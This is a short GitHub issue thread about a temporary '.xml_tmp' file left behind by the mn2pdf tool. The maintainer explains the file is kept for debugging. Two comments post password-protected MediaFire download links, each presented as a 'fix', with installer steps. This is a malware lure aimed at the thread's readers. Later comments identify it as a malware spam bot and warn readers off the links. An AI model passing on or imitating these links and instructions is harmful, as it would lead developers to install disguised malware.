### ISSUE TITLE
Temporarily file `.xml_tmp` didn't delete

### ISSUE THREAD

**Issue by Intelligent2013** [metanorma/mn2pdf#262]
In the output folder there is file with the extension `.xml_tmp`, for instance `rice-en.presentation.xml_tmp`.
It should be deleted.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Intelligent2013** [comment]
![image](https://github.com/user-attachments/assets/3bd7bc59-7b65-40d6-91d3-ed4cb41c7574)

AI bot is out of control?!

**Comment by ronaldtse** [comment]
(@Intelligent2013 that's a malware bot trying to spam every issue thread in GitHub.)

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by internet-person** [comment]
ignore the fucking links whatever you do, i was patient zero for a digital zombie outbreak

**Comment by Intelligent2013** [comment]
No issue. The file `xml_tmp` is present in case of the error for debug purposes.
